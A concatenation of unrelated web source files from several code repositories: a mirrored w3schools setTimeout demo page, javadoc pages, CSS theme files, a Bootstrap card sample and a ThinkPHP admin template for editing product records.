googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjs");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<body>
<p>Click the first button alert "Hello" after waiting 3 seconds.</p>
<p>Click the second button to prevent the first function to execute. (You must click it before the 3 seconds are up.)</p>
<button onclick="myFunction()">Try it</button>
<button onclick="myStopFunction()">Stop the alert</button>
<script>
var myVar;
function myFunction() {
myVar = setTimeout(function(){ alert("Hello") }, 3000);
}
function myStopFunction() {
clearTimeout(myVar);
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_win_settimeout_cleartimeout by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:28:05 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jsref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjsref_win_settimeout_cleartimeout.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
POO/Library/dist/javadoc/br/pucminas/engs/poo/database/package-tree.html | brenoemelo/StudyWork | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (1.8.0_05) on Sat Jul 12 18:49:25 BRT 2014 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>br.pucminas.engs.poo.database Class Hierarchy</title>
<meta name="date" content="2014-07-12">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="br.pucminas.engs.poo.database Class Hierarchy";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../br/pucminas/engs/poo/base/control/package-tree.html">Prev</a></li>
<li><a href="../../../../../br/pucminas/engs/poo/login/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?br/pucminas/engs/poo/database/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package br.pucminas.engs.poo.database</h1>
<span class="packageHierarchyLabel">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">br.pucminas.engs.poo.database.<a href="../../../../../br/pucminas/engs/poo/database/ConnectionFactory.html" title="class in br.pucminas.engs.poo.database"><span class="typeNameLink">ConnectionFactory</span></a></li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../br/pucminas/engs/poo/base/control/package-tree.html">Prev</a></li>
<li><a href="../../../../../br/pucminas/engs/poo/login/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?br/pucminas/engs/poo/database/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
sites/default/files/css/css_SthcaaHuO8Kyb-a4ePvdaqmlGuu4t9HeDwx6tYY0yF4.css | plummera/Excellency | html{color:red;font-family:fantasy;}.layout-container{background-image:url(/themes/custom/excellency/assets/images/backgrounds/stressed-linen.png) repeat;}
|
skin/theme/smoking_gray/quirk.css | osssv/osssv-helloworld-wiki | @charset "euc-jp";
/*
Title: smoking_gray
Author: 186
Access: http://d.hatena.ne.jp/smoking186/
http://186.bz/
License: GPL
Comment:¿§¤Î¸òºø¤ò³Ú¤·¤àcss
span.aa¤¬¤Ê¤¼¤«¤¢¤ë
smoking_gray.css ¹½Â¤
color.css ¿§¤ÈÇØ·Ê
quirk.css IE¸åÊý¸ß´¹¥â¡¼¥ÉÍÑ DOCTYPEÅù¤Ë¤è¤Ã¤Æ¤Ïºï½ü¤¹¤ë¤³¤È¡£
*/
/* ==================== block ==================== */
h2 {
_width: 100%;
}
h3 {
_top:0px; _left:0px;
h2 , h3 , .body , .section , .comment {
_position:relative;
}
/* ==================== hatena-body only ==================== */
.day {
_position: relative;
_width: 100%;
_margin: 0px;
}
.body {
_width: 100%;
}
.section {
_top:0px; _left:0px;
_width: 100%;
}
.section h3 {
_margin-top: -3px;
}
/* -------------------- comment ------------------------- */
.comment {
_top:0px; _left:0px;
_width: 100%;
}
/* ==================== hatena-body + main + sidebar ==================== */
.main {
_width: 100%;
}
/* menu */
div.adminmenu {
_width: 100%;
}
|
old/tool/dist/javadoc/org/nanovm/converter/class-use/MethodInfo.html | kosch/NanoVM | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_24) on Fri Mar 25 22:49:52 CET 2011 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
Uses of Class org.nanovm.converter.MethodInfo
</TITLE>
<META NAME="date" CONTENT="2011-03-25">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.nanovm.converter.MethodInfo";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/nanovm/converter//class-useMethodInfo.html" target="_top"><B>FRAMES</B></A>
<A HREF="MethodInfo.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>org.nanovm.converter.MethodInfo</B></H2>
</CENTER>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Packages that use <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#org.nanovm.converter"><B>org.nanovm.converter</B></A></TD>
<TD> </TD>
</TR>
</TABLE>
<P>
<A NAME="org.nanovm.converter"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Uses of <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A> in <A HREF="../../../../org/nanovm/converter/package-summary.html">org.nanovm.converter</A></FONT></TH>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../org/nanovm/converter/package-summary.html">org.nanovm.converter</A> that return <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A></CODE></FONT></TD>
<TD><CODE><B>ClassInfo.</B><B><A HREF="../../../../org/nanovm/converter/ClassInfo.html#getMethod(int)">getMethod</A></B>(int index)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A></CODE></FONT></TD>
<TD><CODE><B>ClassLoader.</B><B><A HREF="../../../../org/nanovm/converter/ClassLoader.html#getMethod(int)">getMethod</A></B>(int index)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../org/nanovm/converter/package-summary.html">org.nanovm.converter</A> with parameters of type <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B>ClassInfo.</B><B><A HREF="../../../../org/nanovm/converter/ClassInfo.html#addMethod(org.nanovm.converter.MethodInfo)">addMethod</A></B>(<A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A> methodInfo)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B>ClassInfo.</B><B><A HREF="../../../../org/nanovm/converter/ClassInfo.html#getMethodIndex(org.nanovm.converter.MethodInfo)">getMethodIndex</A></B>(<A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter">MethodInfo</A> methodInfo)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/nanovm/converter/MethodInfo.html" title="class in org.nanovm.converter"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/nanovm/converter//class-useMethodInfo.html" target="_top"><B>FRAMES</B></A>
<A HREF="MethodInfo.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
Client-En/Cards_Header.html | joergkrause/Bootstrap4-Book | <!DOCTYPE html>
<html>
<head>
<title></title>
<meta charset="utf-8" />
<link href="../node_modules/bootstrap/dist/css/bootstrap.css" rel="stylesheet" />
<script src="../node_modules/jquery/dist/jquery.js"></script>
<script src="../node_modules/bootstrap/dist/js/bootstrap.js"></script>
<style>
.sample {
font-size: 100%;
border: 1px dotted silver;
padding: 15px;
}
body {
margin: 50px;
}
</style>
</head>
<body>
<div class="container sample">
<div class="card card-body">
<p class="card-header">Message</p>
<p class="card-body">
Message text
</p>
</div>
</div>
</body>
</html>
|
Application/Admin/View/Goods/edit.html | 545038947/haisys | <extend name="Public/base" />
<block name="body">
<script type="text/javascript" src="__STATIC__/uploadify/jquery.uploadify.min.js"></script>
<div class="main-title cf">
<h2>商品-编辑</h2>
</div>
<!-- 标签页导航 -->
<div class="tab-wrap">
<ul class="tab-nav nav">
<li data-tab="tab1" class="current"><a href="javascript:void(0);">基 础</a></li>
<li data-tab="tab2"><a href="javascript:void(0);">分 类</a></li>
<li data-tab="tab3"><a href="javascript:void(0);">属 性</a></li>
<li data-tab="tab4"><a href="javascript:void(0);">商品详细描述</a></li>
<li data-tab="tab5"><a href="javascript:void(0);">画 册</a></li>
</ul>
<div class="tab-content">
<!-- 表单 -->
<form id="form" action="{:U('update')}" method="post" class="form-horizontal doc-modal-form">
<!-- 基础 -->
<div id="tab1" class="tab-pane in tab1">
<div class='form-item cf'>
<label class="item-label">商品名称<span class="check-tips"> </span></label>
<div class='controls'>
<input type="text" class="text input-large" name="name" value="{$fields.name}">
</div>
</div>
<div class='form-item cf'>
<label class="item-label">商品标题<span class="check-tips"> </span></label>
<div class='controls'>
<input type="text" class="text input-large" name="title" value="{$fields.title}">
</div>
</div>
<div class='form-item cf'>
<label class="item-label">商品编码<span class="check-tips"> </span></label>
<div class='controls'>
<input type="text" class="text input-small" name="code" value="{$fields.code}">
</div>
</div>
<div class='form-item cf'>
<label class="item-label">商品缩略图<span class="check-tips"> </span></label>
<div class='controls'>
<input type="file" id="upload_picture_goodspic">
<input type="hidden" name="goodspic" id="cover_id_goodspic" value="{$fields[goodspic]}"/>
<div class="upload-img-box">
<notempty name="fields[goodspic]">
<div class="upload-pre-item"><img src="__ROOT__{$fields[goodspic]|get_cover='path'}"/></div>
</notempty>
</div>
<script type="text/javascript">
//上传图片
/* 初始化上传插件 */
$("#upload_picture_goodspic").uploadify({
"height" : 30,
"swf" : "__STATIC__/uploadify/uploadify.swf",
"fileObjName" : "download",
"buttonText" : "上传图片",
"uploader" : "{:U('File/uploadPicture',array('session_id'=>session_id()))}",
"width" : 120,
'removeTimeout' : 1,
'fileTypeExts' : '*.jpg; *.png; *.gif;',
"onUploadSuccess" : uploadPicturegoodspic
});
function uploadPicturegoodspic(file, data){
var data = $.parseJSON(data);
var src = '';
if(data.status){
$("#cover_id_goodspic").val(data.id);
src = data.url || '__ROOT__' + data.path
$("#cover_id_goodspic").parent().find('.upload-img-box').html(
'<div class="upload-pre-item"><img src="' + src + '"/></div>'
);
} else {
updateAlert(data.info);
setTimeout(function(){
$('#top-alert').find('button').click();
$(that).removeClass('disabled').prop('disabled',false);
},1500);
}
}
</script>
</div>
</div>
<div class='form-item cf'>
<label class="item-label">价格<span class="check-tips"> </span></label>
<div class='controls'>
市场价:
<input type="text" class="text input-small" name="price_1" value="{$fields.price_1}">元<br>
商场价:
<input type="text" class="text input-small" name="price_2" value="{$fields.price_2}">元
</div>
</div>
<div class='form-item cf'>
<label class="item-label">有效时间<span class="check-tips"> </span></label>
<div class='controls'>
<input type="text" name="starttime" class="text input-small time" value="{$fields['starttime']|time_format='Y-m-d'}" placeholder="请选择时间" />
至
<input type="text" name="endtime" class="text input-small time" value="{$fields['endtime']|time_format='Y-m-d'}" placeholder="请选择时间" />
</div>
</div>
<div class='form-item cf'>
<label class="item-label">排序值<span class="check-tips"> </span></label>
<div class='controls'>
<input type="text" class="text input-large" name="sortorder" value="{$fields.sortorder}">
</div>
</div>
<div class='form-item cf'>
<label class="item-label">销售状态:上架,下架<span class="check-tips"> </span></label>
<div class='controls'>
<select name="sellstatus">
<option value="1" <eq name="$fields['sellstatus']" value="1">selected</eq>>上架</option>
<option value="0" <eq name="$fields['sellstatus']" value="0">selected</eq>>下架</option>
</select>
</div>
</div>
<div class='form-item cf'>
<label class="item-label">添加人:<span class="check-tips">{$fields.adderid|D('Member')->getNickName}</span></label>
</div>
<div class='form-item cf'>
<label class="item-label">添加时间:<span class="check-tips">{$fields['addtime']|time_format}</span></label>
</div>
<div class='form-item cf'>
<label class="item-label">最近修改人<span class="check-tips">{$fields.modifyid|D('Member')->getNickName}</span></label>
</div>
<div class='form-item cf'>
<label class="item-label">最近修改时间:<span class="check-tips">{$fields['modifytime']|time_format}</span></label>
</div>
</div>
<!-- 分类 -->
<div id="tab2" class="tab-pane tab2">
<div class='form-item cf'>
<label class="item-label">供货商<span class="check-tips"> </span></label>
<div class='controls'>
<select name="supplierid">
<volist name="supplierlist" id="vo">
<option value="{$vo.id}" <if condition="$fields['supplierid'] eq $vo['id']">selected</if> >{$vo.name}</option>
</volist>
</select>
</div>
</div>
<div class='form-item cf'>
<label class="item-label">商品类别<span class="check-tips"> </span></label>
<div class='controls'>
<select name="goodscatid">
<volist name="goodcatlist" id="vo">
<option value="{$vo.id}" <if condition="$fields['goodscatid'] eq $vo['id']">selected</if> >{$vo.name}</option>
</volist>
</select>
</div>
</div>
</div>
<!-- 属性 -->
<div id="tab3" class="tab-pane tab3">
<div class='form-item cf'>
<label class="item-label">商品类型<span class="check-tips"> </span></label>
<div class='controls'>
<select name="goodstypeid" id="goodstypeid">
<volist name="goodtypelist" id="vo">
<option value="{$vo.id}" <if condition="$fields['goodstypeid'] eq $vo['id']">selected</if> > {$vo.name}</option>
</volist>
</select>
<button type="button" class="btn" id="iniarrt">初始化属性</button>
<div id="loding" style="display:none; margin: 20px;">
<img src="__STATIC__/img/013.gif"><br>数据处理中,请稍候......
</div>
<div id="arrtlist"></div>
</div>
</div>
</div>
<!-- 商品详细描述 -->
<div id="tab4" class="tab-pane tab4">
<div class='form-item cf'>
<label class="item-label">商品详细描述<span class="check-tips"> </span></label>
<div class='controls'>
<label class="textarea">
<textarea name="desc">{$fields.desc}</textarea>
{:hook('adminArticleEdit', array('name'=>'desc','value'=>$fields.desc))}</label>
</div>
</div>
</div>
<!-- 画册 -->
<div id="tab5" class="tab-pane tab5">
<div id="albumlists"></div>
</div>
<!-- 按钮 -->
<div class="form-item cf">
<div id="showhtml"></div>
<label class="item-label"></label>
<div class="controls edit_sort_btn">
<input type="hidden" name="id" value="{$fields['id']}" id="goodsid"/>
<button class="btn submit-btn ajax-post no-refresh" type="submit" target-form="form-horizontal">确 定</button>
<button class="btn btn-return" onclick="javascript:history.back(-1);return false;">返 回</button>
</div>
</div>
</form>
</div>
</div>
</block>
<block name="script">
<link href="__STATIC__/datetimepicker/css/datetimepicker.css" rel="stylesheet" type="text/css">
<php>if(C('COLOR_STYLE')=='blue_color') echo '<link href="__STATIC__/datetimepicker/css/datetimepicker_blue.css" rel="stylesheet" type="text/css">';</php>
<link href="__STATIC__/datetimepicker/css/dropdown.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="__STATIC__/datetimepicker/js/bootstrap-datetimepicker.min.js"></script>
<script type="text/javascript" src="__STATIC__/datetimepicker/js/locales/bootstrap-datetimepicker.zh-CN.js" charset="UTF-8"></script>
<script type="text/javascript" src="__STATIC__/plugins/artDialog/jquery.artDialog.js?skin=idialog"></script>
<script type="text/javascript" src="__STATIC__/function.js"></script>
<script type="text/javascript" charset="utf-8">
Think.setValue("extend", {$info.extend|default=0});
//导航高亮
$('.side-sub-menu').find('a[href="{:U('Goods/index')}"]').closest('li').addClass('current');
$(function(){
$('.time').datetimepicker({
format: 'yyyy-mm-dd hh:ii',
language:"zh-CN",
minView:2,
autoclose:true
});
$("#iniarrt").click(function(event) {
$("#loding").css('display', '');
$.post("{:U("Goods/resetarrt")}?timekey="+(new Date()).valueOf(),
{
id:$("#goodsid").val(),
typeid:$("#goodstypeid").val(),
tmp:'test'
},
function(data,status){
if (data!="") {
$("#arrtlist").html("");
$("#arrtlist").html(data["info"]);
$("#loding").css('display', 'none');
}
else
{
getarrtitems($("#goodsid").val());
};
});
});
showTab();
getarrtitems($("#goodsid").val());
getalbumlists($("#goodsid").val());
})
//取属性列表
function getarrtitems(goodsid)
{
$("#arrtlist").html("");
$("#loding").css('display', '');
$.post("{:U("Goodsarrt/getitemlist")}?timekey="+(new Date()).valueOf(),
{
goodsid:goodsid,
tmp:'test'
},
function(data,status){
$("#arrtlist").html(data);
$("#loding").css('display', 'none');
});
}
//取画册列表
function getalbumlists(goodsid)
{
$("#albumlists").html("");
$("#loding").css('display', '');
$.post("{:U("Goodsalbum/ajaxedit")}?timekey="+(new Date()).valueOf(),
{
goodsid:goodsid,
tmp:'test'
},
function(data,status){
$("#albumlists").html(data);
$("#loding").css('display', 'none');
});
}
</script>
</block>
|
wp-content/themes/evolet/admin/layouts/ff9933.css | shagstaphone/lostmoon | .colored { color:#FF9933;}
.link, .meta2 a { color:#FF9933;}
.color-line { background:#FF9933}
a.button_readmore:hover {
background-color:#ff9933;
}
.service:hover > h4 { color:#ff9933;}
#jstwitter .tweet a {
color: #FF9933;
}
.comment .button_readmore:hover {
background-color:#ff9933;
}
.form-wrapper #submit:hover,
.form-wrapper #submit:focus,
#submit_form:hover,
#submit_form:focus {
background-color: #ff9933;
background-image: none;
border: 1px solid #ff9933;
}
.menu ul a:hover {
background-color: #ff9933;
background-image: none;
}
.menu ul li:first-child a:hover:after {
border-bottom-color: #ff9933;
}
.menu ul ul li:first-child a:hover:after {
border-right-color: #ff9933;
border-bottom-color: transparent;
}
